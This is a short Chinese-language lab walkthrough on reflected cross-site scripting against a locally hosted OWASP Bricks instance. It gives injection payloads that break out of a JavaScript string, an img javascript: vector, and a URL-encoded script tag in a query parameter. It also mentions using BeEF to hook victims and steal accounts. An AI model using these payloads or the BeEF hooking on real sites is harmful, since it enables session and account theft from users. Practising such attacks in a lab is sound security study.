真实环境下xss的实战演练
1反射型xss的演示:
1.1环境的本地部署:
这里只是一些基本内容,用到的工具有phpstudy一种而已,具体方法可以参考我的第一次博客,xss的网页源码,均会在这次实战演练中涉及:
源码部分:
1.2最终环境搭建完毕示意图:
1.3反射型攻击语句的提交:
‘data’参数发起攻击: mitnick’;alert(‘XSS’);var c=’
不需要插入
提交后的源代码
<html><body>
<script>
var a = '<script>mitnick';alert('XSS');var c='';
var b = 'other_value';
document.write('<textarea>' + a + '</textarea>');
</script>
</body></html>
XSS攻击的途径:
<img src==“javascript:alert(‘xss’)” />
1.4BeEF利用xss漏洞(重定向到新的网页)比较危险:
安装beef比较困难,出现问题,因个人原因,大家可以后台私信我。
成功启动beef的界面如下:
启动owasp界面如下:
传入下列参数:
http://192.168.141.131/owaspbricks/content-2/index.php?user=harry
修改下列传参:模拟xss漏洞
http://192.168.141.131/owaspbricks/content-2/index.php?user=harry00%3Cscript%3Ealert(%27xss%27)%3C/script%3E
尝试仿制url:
beef可以监听到一些信息
beef提交监听,可以实施盗号: